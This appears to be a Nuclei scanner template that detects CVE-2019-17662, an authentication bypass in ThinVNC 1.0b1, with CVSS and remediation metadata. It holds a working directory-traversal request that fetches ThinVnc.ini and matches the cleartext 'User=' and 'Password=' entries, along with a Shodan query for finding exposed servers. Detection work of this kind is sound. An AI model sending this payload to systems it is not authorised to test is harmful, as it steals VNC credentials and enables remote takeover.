id: CVE-2019-17662 info: name: ThinVNC 1.0b1 - Authentication Bypass author: DhiyaneshDK severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.6101 epss-percentile: 0.97424 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive http: - raw: - | GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "User=" - "Password=" condition: and - type: word part: header words: - "application/binary" - type: status status: - 200 # digest: 4b0a00483046022100a34508945e4b363192d6e3932529626d07bf988a5d9c5837a40852c0682e3189022100cf045fa6b23875d03f7aacd615fc0f78ede56adf98d1ed51bac4e0b7fdda9d86:922c64590222798bb761d5b6d8e72950